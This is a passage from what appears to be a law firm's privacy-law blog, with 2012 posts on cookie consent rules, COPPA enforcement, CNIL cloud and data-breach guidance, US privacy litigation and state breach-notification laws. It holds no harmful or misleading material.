  • Where cookies perform multiple functions, they will only be exempt from the consent requirement if all of the distinct purposes individually satisfy the exemption criteria. The Opinion sets out several helpful examples of situations where cookies will or will not be exempt from the consent requirement by specifically discussing “user-input” cookies, authentication cookies, user-centric security cookies, multimedia player cookies and load balancing cookies, user interface customisation cookies, and social plug-in content sharing cookies.
  • Cookies which the Working Party considered to be outside the exemption from consent included social plug-in tracking cookies, third-party cookies used for behavioural advertising, and first-party analytic cookies, even though the Working Party recognised that such cookies represent a low privacy risk where they are limited to aggregated statistical data, and where the website operator provides clear information about cookies and adequate privacy safeguards, such as an opt-out from data collection and anonymisation.

California App Developer Settles Lawsuit with New Jersey AG

This post was written by John P. Feldman and Frederick Lah.

In early June, New Jersey Attorney General Jeffrey Chiesa and the New Jersey Division of Consumer Affairs brought a complaint against California-based mobile app developer 24x7 Digital LLC for alleged violations of the Children's Online Privacy Protection Act ("COPPA"). The state alleged that 24x7 Digital, through its "TeachMe" Apps, was collecting the names and unique device identifiers ("UDIDs") of children and transmitting them to a third party, without the COPPA-required notice or parental consent.

Just three weeks later, the two sides have settled. As part of the settlement, 24x7 Digital represented that it will destroy all of the information collected in violation of COPPA and that it has stopped collecting such information. The developer also agreed to comply with monitoring and reporting requirements. No money appears to be a part of the settlement. The attorney general hailed the settlement as a "clear victory for children's privacy in the age of mobile devices and the easy transfer of personal information."

According to a press release, this lawsuit was the first filed as a result of the state's ongoing initiative on Internet privacy and cyberfraud. The state hinted that more suits may be on the way, saying that the Division is continuing to investigate other mobile applications and their possible unlawful sharing of personal information.

Notable is the speed with which this lawsuit was settled, as well as the absence of any money attached to this order. Cooperation and quick action may have paid off for 24x7 Digital.

Cloud Computing: The French CNIL Issues Partly Binding Guidance

This post was written by Daniel Kadar.

On 25 June 2012, the CNIL published on its website a summary article and a 10-page conclusion paper, along with a 21-page “recommendations” document, which constitute the French Data Protection Authority’s new guidance in that regard.

Aimed at small- to medium-sized companies considering cloud computing services, and at helping them make more informed decisions regarding such services, these “recommendations” are in fact seven principles applicable to all cloud computing service agreements, to which the CNIL connects five “essential elements that have to be part to a Cloud computing services agreement”. In addition, the CNIL provides a 10-page document of “model clauses” intended to implement the aforementioned “essential recommendations”.

Another essential point that the CNIL outlines in its guidance is that, in its view, the cloud computing service provider can hardly escape the legal qualification of data controller, since the presumption that the cloud computing service provider is a simple data processor can easily be reversed.

This new guidance shows the CNIL’s intention to impose new contractual standards in the short term.

For a more detailed analysis, please click here to read the issued Client Alert.

The International Working Group on Data Protection in Telecommunications issues "Working Paper on Cloud Computing" on 24 April 2012

This post was written by Cynthia O'Donoghue.

The International Working Group on Data Protection in Telecommunications (“the Working Group”) released a working paper on privacy and data protection issues surrounding cloud computing, specifically examining the processing of personal data. The paper recognises the growing popularity of cloud computing; however, the Working Group advises that caution should be taken because cloud computing is still relatively new. The paper sets out a number of recommendations on how to minimise the risk of data loss, and on the precautions that should be taken in cloud computing environments.

The National Institute of Standards and Technology defines ‘cloud computing’ in its Special Publication 800-145, which the Working Group describes as “an excellent starting point for the further investigation” of cloud computing and how it can be used. However, there is still a level of uncertainty around cloud computing, in particular in relation to privacy and data protection issues; and the evolution of cloud computing has raised a number of important issues which are discussed in the paper, including the fact that:

  • The technology is still in progress
  • The technology is boundless and trans-boundary
  • Data processing has become global as a result of cloud computing
  • There is a general lack of transparency around cloud service providers

As a result, these issues may lead to an increased risk of breaches of:

  • Information security going unnoticed by a data controller
  • Data being transferred to jurisdictions that do not have adequate data protections in place
  • A data controller losing control of the data

The Working Group makes a number of recommendations on the subject of the relationship between data protection and cloud computing, including that:

  • Cloud computing must not lead to a lowering of data protection standards
  • Data controllers should carry out privacy impact and risk assessments (as necessary) before embarking on cloud computing projects
  • Data protection regulatory authorities (DPAs) should continue to provide information on the privacy and data protection issues affecting cloud computing

In addition to the recommendations, the Working Group lists 27 guidance points on best practice, and an additional 17 points on the background to the recommendations.

On best practice guidance, the key points include:

  • Cloud computing implementation should take place in measured steps, starting with non-sensitive and non-confidential information
  • Processing sensitive data via cloud computing raises additional concerns and therefore requires additional safeguards
  • Location audit trails should be automatically made available to data controllers and DPAs
  • Effective technical measures should be developed to prevent personal data from being transferred illegally to jurisdictions without adequate data protection
  • Personal data at rest and in transit should be encrypted. Encryption keys should not be available to anyone other than the data controller and cloud service provider.

For the full list of guidance points and recommendations, the Working Group paper can be found here.


"NAAG President Announces 'Privacy in a Digital Age' Initiative"

This post was written by Paul Bond and Christine E. Nielsen.

The state attorneys general, led by Maryland Attorney General Doug F. Gansler, are gearing up for a year focused on privacy and the Internet. On June 21, AG Gansler was installed as the 2012-13 president of the National Association of Attorneys General (NAAG). As the NAAG President, AG Gansler announced that he will spearhead a national initiative examining privacy and the Internet, the Presidential Initiative for the coming year. To kick-start that initiative, “Privacy in a Digital Age,” privacy panel discussions during the NAAG summer meeting focused on privacy in online gaming and the theft of children’s Social Security numbers. Although it is impossible to predict what specific topics the attorneys general will focus on as part of the Presidential Initiative, educated guesses can be made by reviewing recent attorney general privacy and data security actions, as well as looking at what is on the radar for federal regulators. Our predictions for the top three issues: (1) children, (2) mobile, and (3) privacy policies.

New Jersey Attorney General Jeffrey S. Chiesa set the stage for AG enforcement action against mobile application (app) developers with his lawsuit against app developer 24 x 7 Digital, LLC. On June 4, New Jersey sued 24 x 7 for collecting and transmitting the names and unique device identifiers (UDIDs) from children without parental consent in violation of the Children’s Online Privacy Protection Act (COPPA). Although most state AGs have not been particularly active in COPPA enforcement, this case is an important reminder that they have that authority, and may be flexing their muscle in this area in the months to come.

California Attorney General Kamala D. Harris also recently took a closer look at the fact that many mobile app developers do not disclose their data collection practices to app users, and entered into agreements with six leading mobile app platform providers to require developers to create, implement and maintain privacy policies. We wrote about that agreement here. Facebook has also just signed a similar agreement with AG Harris for its new App Center. Thirty-seven state attorneys general, led by AG Gansler and AG Rob McKenna of Washington, sent a letter to Google in February of this year outlining their concerns with Google’s changing privacy policy. The attorneys general have long argued that companies should mean what they say in their privacy policies, and should not make unilateral changes that harm consumers. As the 2012-13 Presidential Initiative gets underway, it is a safe bet the attorneys general will continue to scrutinize disclosures made in privacy policies, especially in those related to products and services available in the mobile space.

It is not a surprise that these areas should be receiving special attention by the states, as mobile apps, children’s issues and disclosures in privacy policies have been front and center for federal agencies looking at privacy issues. We have discussed the Federal Trade Commission’s most recent reports on privacy here and the Department of Commerce’s report here. One recommendation from Commerce’s report – the convening of stakeholder meetings to develop privacy codes of conduct – is already being implemented. Stakeholders interested in the transparency of data collection by mobile applications will converge on Washington, D.C. July 12 to discuss the topic at length. The National Telecommunications and Information Administration’s (NTIA) blog announcing that mobile will be the first topic is available here. FTC Commissioner Julie Brill also reiterated the FTC’s top three privacy issues – data brokers, mobile, and privacy policies for social networks – at the annual privacy and data security Practising Law Institute conference in New York.

ICANN Releases List of Domain Name Applications

This post was written by Amy S. Mushahwar.

Reed Smith is actively monitoring the changing top-level domain name environment, which has large implications for Internet security, stability and navigability. On June 13, the Internet Corporation for Assigned Names and Numbers (ICANN) released the list of the domain names applied for, with more than 1930 applications for top-level domains (the part to the right of the final dot in an Internet address, such as .com in reedsmith.com). If even one-half of these applied-for top-level domains are delegated into the Internet root, we could see the domain name space increase more than 4300 percent over the 22 generic top-level domains that are in place today. Such a vast domain expansion will only increase the number of places for felons and other nefarious characters to hide online. Reed Smith will continue to monitor such developments and will have an attorney at ICANN's Prague meeting to report on developments.

For further information, please click here to read our recently issued Client Alert.

Judge Narrows App Litigation, But Lets Plaintiffs Press On

This post was written by Christopher G. Cwalina, Paul Bond, and Christine E. Nielsen.

A recent decision in ongoing litigation over mobile application practices shows how difficult the defense of privacy class actions can be. Even if the defense wins dismissal of some causes of action, the survival of any cause of action may force the defendant into costly discovery.

On June 12, U.S. District Judge Lucy Koh granted in part and denied in part the Motions to Dismiss filed in the iPhone Application Litigation MDL in the Northern District of California, case no. 5:11-md-02250. In this case, plaintiffs claimed defendants violated plaintiffs’ privacy rights by unlawfully allowing third-party applications to collect and use personal information, including location information, from users’ mobile devices without consent. Plaintiffs brought 13 causes of action against Apple and the Mobile Industry defendants, including those based on federal statute, state statute, contract law, tort, and equity.

Defendants contended that plaintiffs lacked Article III standing and the case should be dismissed for lack of subject matter jurisdiction. They argued that plaintiffs failed to allege actual injury-in-fact. Judge Koh disagreed, noting that “Plaintiffs have alleged actual injury, including: diminished and consumed iDevice [iPhone, iPad, and iPod Touch] resources, such as storage, battery life and bandwidth; increased, unexpected, and unreasonable risk to the security of sensitive personal information; and detrimental reliance on Apple’s representations regarding the privacy protection afforded to users of iDevice apps.” The court found that plaintiffs’ alleged overpayment for those devices was enough to establish standing under California’s Unfair Competition Law (UCL). The court then found that the alleged business practices may be unlawful under California’s Consumer Legal Remedies Act (CLRA), unfair in that they are injurious to consumers and may not be outweighed by benefits to consumers, and fraudulent in that Apple made misrepresentations and material omissions to induce the purchase of mobile devices.

In addition, the court declined to dismiss the claims on the grounds that Apple’s Privacy Policy expressly permitted the collection and transfer of user data at issue, in part because the policy’s language was ambiguous as to the exact definition of “personal information.” Although many of the counts against Apple, and all of the counts against the other Mobile Industry defendants – Admob, Inc., Flurry, Inc., AdMarval, Inc., Google, Inc., and Medialets, Inc. – were dismissed, counts against Apple under the CLRA and UCL will proceed.

Notably, the court rejected Apple’s argument that all of the claims should be dismissed on the grounds that Apple has permission to collect and transfer user data pursuant to the Privacy Policy. On this point, the court said that “Plaintiffs have a colorable argument that the terms of the privacy agreement were ambiguous and do not necessarily foreclose the remaining claims against Apple.” The court stated that there was ambiguity as to whether something like a user’s unique device identifier is “personal information” under the terms of the privacy policy, and thus whether its collection and use was consistent with that policy. While this is one trial court decision on a preliminary motion, the decision reinforces the need for companies to closely examine disclosures to see how well they would hold up in any subsequent litigation.

The UK Information Commissioner's Office Has Received Numerous Complaints about Websites not adhering to the 'Cookie' law

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner's Office (ICO) has received 169 complaints thus far about websites whose policies appear not to comply with the cookie law that came into force May 26, V3.co.uk reports. Commissioner Christopher Graham is reported to have said that the complaints indicate what individuals are interested in and should serve as a warning to organisations that are not yet compliant. "…There are many [complaints] where customers are pointing out that well-respected brands are not doing anything about the cookie law and [these customers] can't understand why not," Graham said. The CIO Journal is reporting that the ICO has sent out 70 letters to companies that have yet to comply, including to Tesco, Facebook and HSBC.

Despite the alleged non-compliance, the ICO was issuing new guidance right up until the eve of the end of the grace period for enforcement. On May 25, the ICO published revised guidance to clarify points around implied consent, and the ICO’s Strategic Liaison Group Manager for Business and Industry posted a blog with a video containing answers to FAQs.

The new guidance confirms that implied consent is a valid form of user consent and complies with the Privacy and Electronic Communications (EC Directive) (Amendment) Regulations 2011, and can be used instead of an explicit opt-in measure. This issue had troubled organisations as the previous guidance seemed to suggest implied consent would not be valid, although website operators are not meant to rely on an assumption that users have read a privacy policy that may be hard to find or difficult to understand.

The latest ICO guidance confirms that user consent can be inferred from users navigating among website pages, provided users have a reasonable understanding that by doing so they have agreed to cookies being set.

The latest guidance also addresses the issue of “prior” consent. The ICO’s position is that, wherever possible, cookies should only be set once users have had an opportunity to understand what cookies are being used and to indicate their consent; where it is not possible to obtain this prior consent, website operators should be able to demonstrate that they are doing as much as possible to provide timely information about what cookies will be placed on the users’ device.

In addition, the guidance clarifies that the mere placement of a statement about cookies in a privacy policy is not sufficiently prominent, and website operators are expected to give a clear and specific explanation to the ICO about why their website is not fully compliant. The ICO further explained that there will be a ‘sliding scale’ of enforcement, with the most intrusive cookies that pose a risk of harm to individuals being the focus of the ICO’s enquiries. Since the blog contains a link where users are invited to report their cookie concerns, expect to see the ICO making further statements about the number of complaints and their investigations.

France: Electronic Communications Providers Must Now Immediately Notify a Data Breach to the CNIL

This post was written by Daniel Kadar.

On 28 May, the French CNIL released new practical guidance on data breaches. A new Article 34 bis has been added to the French Data Protection Act as part of implementing the Telecom Package, obliging Electronic Communications Providers (ECPs) to notify the French CNIL “without delay” of any data breach.

Such ECPs are all telecommunication operators registered with the French telecommunications authority (ARCEP), and therefore also include all international/foreign Electronic Communications Providers operating in France.

1. The CNIL has set out detailed topical situations in which such immediate notification is required, including:

  • Intrusion into the client database of the ECP
  • Security breach in an online ECP-boutique allowing access to the credit card number of customers
  • Distribution of a confidential customer email to non-related third parties
  • Loss of hard copy contractual documents by an agent of a telecom provider in a boutique

The guidance also mentions situations in which such notification is not required:

  • Intrusion into the ECP’s own HR database
  • Any breach related to activities unrelated to providing electronic communication services to the public

2. The guidance outlines the procedure to be followed in the event of a data breach: the notification to the CNIL has to provide full information concerning the nature and the consequences of the data breach; detail measures that have been implemented and/or are planned in response to the breach; identify the persons to be contacted who are in charge internally of resolving the issue; and estimate the number of data owners concerned by the breach.

3. Another key issue is public and/or customer information. The guidance indicates that the CNIL has two months to react to the ECP’s notification and to provide guidance on whether affected customers should be informed.

Should the breach be massive and regarded as important by the CNIL, then immediate information to affected customers could be required by the French Data Protection Agency.

Should such immediate information not be required by the CNIL, customer information could be required after the CNIL has reviewed the ECP’s notification. The ECP would only be exempted from informing customers if the French Data Protection Agency considers the measures taken to resolve the data breach as sufficient. Nonetheless, in the absence of a response from the CNIL within the two-month timeframe, information to customers would be required.

4. This new addition to the French Data Protection Act has a broad reach: it applies to all ECPs operating in France and could be considered enforceable as soon as one customer located in France is affected by the data breach.

This could force ECPs to notify the French regulator proactively in any case, in addition to other regulators. The CNIL has reiterated that sanctions for failing to notify a data breach include fines of up to €300,000 and up to five years’ imprisonment, whilst non-compliance with the French regulation itself can be sanctioned by fines of up to €300,000.

New Jersey Appeals Court Holds that Defendant Who Often Shared Cell Phone Number Did Not Have Reasonable Privacy Interest in Cell Phone Number

This post was written by Paul Bond and Frederick Lah.

Last week, the New Jersey Appellate Division affirmed a lower court's decision that a defendant did not have a reasonable privacy interest in his cell phone number. Defendant was a middle school teacher who had a sexual encounter with a student when the student was 13 years old. A conversation between the teacher and the student was set up and taped by the police, after a local officer obtained the cell phone number from the school's principal. Defendant objected that he had a reasonable expectation of privacy in his cell phone number and that the state could acquire it only with a warrant.

The court ruled that a telephone number could be protected in some circumstances, but that here, the defendant retained no reasonable privacy interest. The holding was based, in part, on the fact that the defendant exhibited no surprise that the victim had his number and that the defendant had in the past disclosed his number to the middle school community, i.e., he had previously provided his telephone number to students and their parents in connection with a field trip, and he had provided his number for an internal school staff directory. Once disclosed to these discrete communities for those stated purposes, the cell phone number lost its status as private information.

The court's common-sense ruling stands in tension with other quickly developing threads of privacy law. Increasingly, companies are being required to tell consumers more about the uses to which their information will be put. The burden on companies to provide "use specification" in ever-growing detail obscures the basic truth that information widely shared is not private. The defendant here made the previous disclosures with the understanding that they would only be used in connection with the field trip and for the internal directory, not for law enforcement purposes. Defendant never consented to having his cell phone number disclosed for law enforcement purposes. But by frequently sharing his cell phone number, he divested himself of the right to object to further sharing, including with the police.

These issues fall in line with previous discussions we've had on this site about this concept of public privacy. Those discussions can be found here and here. Previously, we asked whether the fact that we lose some privacy when we’re in public places means that we should be subject to being recorded, with the possibility that the recording be widely publicized on the Internet. Here, we see an analogous line of questioning play out in the context of personally identifiable information. Does the fact that personally identifiable information is voluntarily disclosed to some members of the public mean that the information loses its privacy interest, even if the information is subsequently used for a purpose different from the one for which it was originally disclosed? The court's decision here provides at least one perspective on the issue.

National Labor Relations Board Issues Third Report on Social Media Cases

On May 30, 2012, Acting General Counsel Lafe Solomon of the National Labor Relations Board (NLRB) issued his third in a series of reports giving employers a road map of a lawful social media policy. In the report, the NLRB reviews seven cases of employer social media policies handled by the NLRB, six of which in part violate the National Labor Relations Act. Included in the six "violation" cases are the following impermissible elements of social media policies:

  1. Rules Defining Confidential Information Too Broadly
  2. Rules Requiring the Accuracy of Employee Communications
  3. Rules Requiring Employees to Seek Guidance from Their Employer
  4. Rules Discouraging Communication or Requiring Reporting of Improper Communication
  5. Rules Restricting Communications with Government Officials or the Media
  6. Rules Prohibiting Posting of Photos or Videos

Continue reading here on Reed Smith's Employment Law Watch Blog.


The UK Information Commissioner's Office issues the largest monetary penalty in its history to NHS hospital trust

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner’s Office (“ICO”) has issued its largest-ever fine of £325,000 GBP ($503,705 USD) to Brighton and Sussex University Hospitals NHS Trust following the discovery of highly sensitive personal data belonging to tens of thousands of patients and staff, including information relating to sexual health and HIV, on hard drives sold on an Internet auction site in October and November 2010. This marks the highest fine for a “serious breach” of the UK Data Protection Act issued to date by the ICO. In April 2010, the ICO was granted additional powers to issue monetary penalties of up to £500,000.

The ICO's Deputy Commissioner and Director of Data Protection David Smith said in a statement that the high amount of the penalty “reflects the gravity and scale of the data breach.” The fine is also meant to deter lax compliance by warning organisations that they remain liable for the information management activities they outsource.

The Brighton and Sussex University Hospitals NHS Trust had outsourced the destruction of 1,000 hard drives which contained the sensitive data to a third party. However, rather than being destroyed, some of the hard drives were sold in an auction.

Since January 2012, the ICO has issued at least eight fines ranging from £70,000 to £140,000 for various serious data breaches. Some of the highest penalties issued to date have included:

  • £140,000, issued in January of this year against Midlothian Council for disclosing sensitive personal data relating to children and their carers to the wrong recipients on five occasions
  • £130,000, issued in December 2011 to Powys County Council after the details of a child protection case were sent to the wrong recipient
  • £120,000, issued in June 2011 against Surrey County Council after sensitive personal information was emailed to the wrong recipients on three occasions

The ICO is increasingly using its powers to issue fines and, by doing so, sending a strong message that serious breaches of the Data Protection Act will not be tolerated.

The French Data Protection Authority unveils its agenda and targets for inspections in 2012

This post was written by Cynthia O'Donoghue.

The French Data Protection Authority (the “CNIL”) issued a press release 19 April 2012 detailing its planned enforcement agenda for the coming year. The CNIL announced that it intends to conduct around 450 on-site inspections during 2012, with particular focus on six specific themes. The CNIL will also continue work started in 2011, including at least 150 inspections related to video surveillance.

The focus will be on the following areas:

Smartphones: The CNIL will investigate both the purchasing and use of smartphones, in particular data collection by mobile operators and app providers. In relation to mobile operators, the CNIL will focus on the database of mobile customers and the extent of monitoring their customers’ usage.

Health data security: The CNIL intends to continue its work from 2011 in this area and to focus on the development and use of health-related data, in particular by carrying out inspections of medical research facilities, online health-related applications, health care providers, and companies that host health-related data, especially where cloud computing is used.

Data breaches: Given the August 2011 regulations on data breaches, the CNIL will focus on compliance by ISPs to notify the CNIL of data breaches, as well as to notify individuals when the data breach “affects their personal data or private life.”

Sports and hobbies: Despite the CNIL having conducted checks in this sector, the CNIL intends to examine further anti-doping controls, the hosting of sports competitions, and the processing of member and spectator personal data by the main French sports federations, including disclosures to third parties and blacklisting.

Police records: Following a parliamentary report on police records, the CNIL will organize a series of inspections and implement controls on data processing at the national and local levels, relating to the use of personal data and the internal operating services of the police.

Utility and motorway companies: The CNIL intends to focus on transparency of data processing by conducting a broad survey of major companies that provide services to millions of French citizens through the supply of water, gas and electricity, and the collection of road tolls.

Vermont Strengthens Data Breach Notification Law

This post was written by Paul Bond and Frederick Lah.

Vermont has recently updated its data breach notification law, Vt. Stat. Tit. 9, Ch. 62, sections 2430 and 2435, to make it one of the stronger data breach notification laws in the country. The new law became effective May 8, 2012. There are three main changes in the law:

First, the definition of security breach has been amended. Previously, "security breach" meant the unauthorized acquisition or access of data. The new definition no longer covers unauthorized access and only defines the term as "unauthorized acquisition … or a reasonable belief of unauthorized acquisition." To help clarify this new standard, the law lists the following factors that companies should consider when determining whether data has been acquired or reasonably believed to have been acquired:

  • Indications that the information is in the physical possession and control of a person without valid authorization, such as a lost or stolen computer or other device containing information
  • Indications that the information has been downloaded or copied
  • Indications that the information was used by an unauthorized person, such as fraudulent accounts opened or instances of identity theft reported, or
  • Indications that the information has been made public

The second major change of Vermont's law is that it has added a 45-day firm deadline upon discovery of the breach for when consumer notifications must be sent. The vast majority of states speak in general terms and only require that notification be made to consumers "without unreasonable delay" or "in the most expedient time possible." Vermont now joins a handful of other states (Florida, Ohio, and Wisconsin) with a specific firm deadline. All of these states have the same 45-day deadline.

Lastly, the amended law adds a requirement that the state attorney general must be notified of a data breach. The company must notify the attorney general of the date of the breach, date of the discovery of the breach, and a preliminary description of the breach, which shall include the number of Vermont consumers affected, if known. By default, this notification must be done within 14 business days upon discovery of the breach. Puerto Rico is the only other jurisdiction with a firm deadline (10 days) for when government notification must be sent. Interestingly, though, the new law provides companies with an alternative to this 14-business-day requirement. If, prior to the breach, the company has sworn in writing to the attorney general that it maintains written policies and procedures to maintain the security of the consumer information and respond to a breach in a manner consistent with Vermont law, then the 14-business-day requirement would not apply. Instead, the company would just need to notify the attorney general prior to sending the consumer notifications (which have a firm deadline of 45 days). The law provides that the company must make this sworn statement "on a form and in a manner prescribed by the office of the attorney general"; however, no guidance has been released yet on what this form would look like.

This recent update to the Vermont data breach notification law provides yet another wrinkle in the complicated landscape of state data breach notification laws.

Is the New Facebook Settlement About Privacy? Or, Revenge of the Prosser Torts.

This post was written by Mark S. Melodia, Paul Bond, and Frederick Lah.

Recently, Facebook announced a proposed settlement of a national class action in the United States District Court for the Northern District of California. Fraley, et al. v. Facebook, Inc., 5:11-cv-01726. This settlement has been described by some as settlement of a “privacy lawsuit.” See, e.g., “Facebook to Settle Privacy Lawsuit Over Ads” by Ann Miller in The Recorder, and “Facebook Settling ‘Sponsored Stories’ Privacy Lawsuit” by David Kravets. But is the issue really privacy? For reasons from public relations to legal analysis to insurance coverage, knowing how to characterize this type of dispute is crucial.

The Fraley Complaint challenged an alleged Facebook practice in connection with sponsored ads. Per the Complaint, Facebook would not only display such ads, but would also use the “names, photographs, likenesses, and identities” of Facebook users to help promote the product to friends of those users. The Complaint alleges that a user would be associated with a product by choosing to click a “Like” button, and would then be automatically associated with the corresponding ad campaign. The company hit back with a Motion to Dismiss contesting the existence of any claimed “right of identity,” which would be inconsistent with the operation of the campaign. Thereafter, the parties reached a settlement according to a recent court filing, although details of the settlement were not available. A separate but related lawsuit alleging Facebook violates California state law by including minors in the sponsored stories program is still pending before the court.

While the proposed settlement, if approved, will avoid the need to decide these issues in this case, the ambiguities at issue have been in play in United States law for at least 50 years. Dean Prosser, in his 1960 article “Privacy” for the California Law Review, surveyed what was, even in 1960, a haphazard patchwork of legal authority on this point. He concluded:

“What has emerged from the decisions is no simple matter. It is not one tort, but a complex of four. The law of privacy comprises four distinct kinds of invasion of four different interests of the plaintiff, which are tied together by the common name, but otherwise have almost nothing in common except that each represents an interference with the right of the plaintiff…to be let alone.” Dean Prosser, Privacy, 48 Cal. L. Rev. 388, 389 (1960).

Each of the so-called Prosser torts has since found its way into privacy class action allegations in the Internet age.

“Without any attempt to exact definition, these four torts may be described as follows: 1. Intrusion upon the plaintiff's seclusion or solitude, or into his private affairs; 2. Public disclosure of embarrassing private facts about the plaintiff; 3. Publicity which places the plaintiff in a false light in the public eye; and 4. Appropriation, for the defendant's advantage, of the plaintiff's name or likeness.” Id.

Prior suits regarding, for example, disclosure of Internet search histories or video rental habits, focused on the first two of these Prosser torts: intrusion upon the plaintiff's seclusion or solitude, or into his private affairs and public disclosure of embarrassing private facts about the plaintiff. In addition, FTC consent orders such as those entered into by Google in connection with the launch of Google Buzz, or more recently by MySpace, also involve contested claims about supposedly private affairs or private facts improperly disclosed. The Facebook settlement in Fraley is significantly different, and draws directly on the third and fourth of the Prosser torts: publicity that places the plaintiff in a false light in the public eye; and appropriation, for the defendant's advantage, of the plaintiff's name or likeness. The information at issue – that someone “Likes” a certain product – would have already been displayed on that individual’s profile, available to all of his or her friends. The combination of that freely available information with the sponsored ad makes no new information available. This is a “privacy” claim, if at all, under the aegis of the latter Prosser torts. Friends will falsely believe that a user has taken an endorsement role, the theory goes; name and likeness have been misappropriated.

In an age when brands live or die by their ability to leverage social media to improve customer engagement, including by user-generated content, understanding how all the Prosser torts may impact the use of consumer information is more critical than ever.

CNIL vs. Google, Act III: CNIL sends Google a 6-page additional Questionnaire on Google's New Privacy Policy since it is still "impossible to know Google's processings of personal data"

This post was written by Daniel Kadar.

We have previously reported that the French Data Protection Authority (DPA), the CNIL, had sent Google, on 19 March 2012, a 12-page questionnaire divided into no fewer than 69 main questions on Google’s new privacy policy.

The CNIL has been designated by the Working Party 29 to evaluate the compliance with applicable data protection regulation of Google’s new integrated Privacy Policy, as well as of the integrated data processing Google launched on 01 March 2012 despite the CNIL’s demand to postpone that launch.

After analysing Google’s response, received at the end of April, the CNIL sent Google an additional questionnaire on 22 May 2012 in which it asks for a precise description, for each of its previous questions, of the data processing implemented by Google, and considers Google’s approach, which was based on examples, as insufficient. This letter was issued just before a meeting with Google on 23 May in Paris.

While the general tone of the letter from the CNIL’s President, Mrs. Falque-Pierrotin, to Google’s CEO Larry Page is very amicable, the CNIL’s notes on this letter, again published on the CNIL’s website in English, show how deep the CNIL’s concerns are:

  • The CNIL still considers it impossible to know Google's processings of personal data
  • It concludes that there is still no clarification regarding the links between collected data, purposes and recipients
  • It also considers that the obligation of information of the data subjects is not respected
  • The CNIL notes that Google has not provided a maximum retention period for the data 
  • It also wants to clarify the effects of Google's opt-out mechanisms and their validity with respect to the right to oppose
  • The CNIL is still awaiting Google’s answer on the treatment of “passive users”, defined as users of Google's services (advertising, analytics, +1 button) when they visit third-party websites

Google is due, according to the schedule set by the CNIL, to answer this additional questionnaire by 8 June 2012.

The CNIL will then provide its conclusions to the Working Party 29 by mid-July.

The Article 29 Working Party publishes Opinion 02/2012 on the use of facial recognition technology in mobile and online services, highlighting the data protection considerations in its recommendations.

This post was written by Cynthia O'Donoghue.

In the midst of a rapid increase in the availability and accuracy of facial recognition technology in recent years, the Article 29 Working Party adopted in March this year Opinion 02/2012, highlighting the data protection considerations on the use of facial recognition technology in services such as social networking and for smartphones.

For a more detailed analysis, please click here to read the issued Client Alert.

The European Commission proposes establishing a dedicated European Cybercrime Centre to be situated within Europol, and aims for January 2013 launch date

This post was written by Cynthia O'Donoghue.

In a communication from the European Commission to the Council and European Parliament, the Commission proposes establishing a European Cybercrime Centre (“EC3”) to be part of Europol to “act as the focal point in the fight against cybercrime in the EU”. In its communication, the Commission highlights the total cost of cybercrime to global society as significant, and indicates that no crime is as borderless as cybercrime.

Cybercrime is identified as a high-profit but low-risk form of criminal activity that is becoming increasingly common as we become more of an Internet-based society, using the Internet daily to connect with friends on social networks, or to bank online or do business over the Internet. Cybercrime spans a vast range of offences, from identity theft to child sexual abuse to computer fraud and credit card scams, which affect EU citizens on a day-to-day basis, and tackling it is a top priority for the European Commission. There has been some progress and coordinated efforts to tackle cybercrime, but there are still several obstacles to the effective investigation and prosecution of cybercrimes, including jurisdictional boundaries, technical difficulties, and inconsistent cooperation and intelligence-sharing between agencies. The new EC3 will attempt to tackle these obstacles in the fight against cybercrime.

For a more detailed analysis, please click here to read the issued Client Alert.

Virtualization and Cloud Computing Security

Many CISOs have lost the ability to choose whether cloud computing is coming to the company. Chief Financial Officers are demanding the cost savings of the cloud, especially during this tentative economic recovery where every penny must be stretched to its maximum capacity. In an attempt to be responsive and bridge the CISO - CFO divide, Amy Mushahwar presented a program series entitled “Virtualization and Cloud Computing Security: Can the CISO Continue to Push Back?" Her bottom line: if organizations must proceed with cloud computing solutions, they should do so fully informed of the risks and armed with information to minimize potential harm to the enterprise environment.

Reed Smith recently hosted a series of meetings on this topic in its Washington, D.C., New York, Pittsburgh and Philadelphia offices with the CISO Executive Network. Please click here for a recorded video conference of Amy presenting to the Washington, D.C. CISO Executive Network.

Article 29 Working Party adopts a "general positive stance" in its Opinion on the new EU Data Privacy Regulation and Directive

This post was written by Cynthia O'Donoghue.

In the Article 29 Working Party’s Opinion on the new EU data protection reforms, the Working Party has carefully studied both the Regulation and the Directive, and has given its first general reaction. The Working Party welcomed the provisions intended to clarify and strengthen the rights of individuals, including clarification of consent, the introduction of a transparency principle and enhanced redress, as well as the proposals to harmonise the powers among the national data protection authorities (DPAs).

Despite the positive reaction, the Working Party stated its disappointment in having two legal instruments in a Regulation and a Directive, given that the objectives of the two instruments are the same and that a comprehensive legal framework is achievable.

In relation to the Regulation, the Working Party highlights positive aspects, including:

  • Greater clarity through more precise definitions
  • Greater rights for individuals regarding their data, such as more transparency, greater control over data processing and strengthened rights to data access
  • Simplification and greater consistency for data controllers
  • Introduction of Privacy by Design
  • Data breach notification requirements
  • The Right to be Forgotten, which it hopes will strengthen individuals’ controls over their personal data
  • DPAs being given strengthened independence and powers, including fines

The Working Party also highlighted weaknesses, including serious reservations about the delegated powers reserved to the European Commission, as well as concern about the increased costs and resources needed by the DPAs, and the broad exceptions for public authorities by reason of public interest. Weakness in relation to the Right to be Forgotten relates to whether it will be possible to enforce, given the way the Internet works and the lack of a mandatory provision requiring third parties to comply with an individual’s request to erase data.

The Working Party most significantly welcomes the introduction of significant fines, which it believes will act as a deterrent and will contribute to a high degree of compliance by data controllers.

In relation to the Directive, the Working Party fears that the number of inconsistencies between the Regulation and the Directive will result in the two instruments not being complementary, and in the potential for the documents not to work together on core aspects, especially given that the Directive has a lower standard of protection than the Regulation.

As the new Regulation and Directive make their way through the European parliamentary process, it will be interesting to watch whether the two instruments become one so that the overall aim of consistency is achieved, especially as the Directive governs the way in which law enforcement handles individuals’ personal data and there is a desire for not just corporates, but also government, to be held to the same standards.

Cookies - The Heat Is On: Grace period to comply with new cookies law to expire soon!

This post was written by Sakil Suleman and Cynthia O'Donoghue.

It is almost a year since the new European rules on website cookies hit the UK. The new rules are significant and impact upon practically all businesses with a website, not just those that operate an e-commerce site. See earlier blog posting. Largely for this reason, the Information Commissioner’s Office (“ICO”) granted website operators a twelve month grace period to work towards compliance with the new rules. That grace period comes to an end on 26 May 2012, although there are still many businesses which have not yet taken steps to comply with the new rules.

For a more detailed analysis, please click here to read the issued Client Alert.

More Flexibility on Cookies: the French CNIL Softens Its Views on User Consent

This post was written by Daniel Kadar.

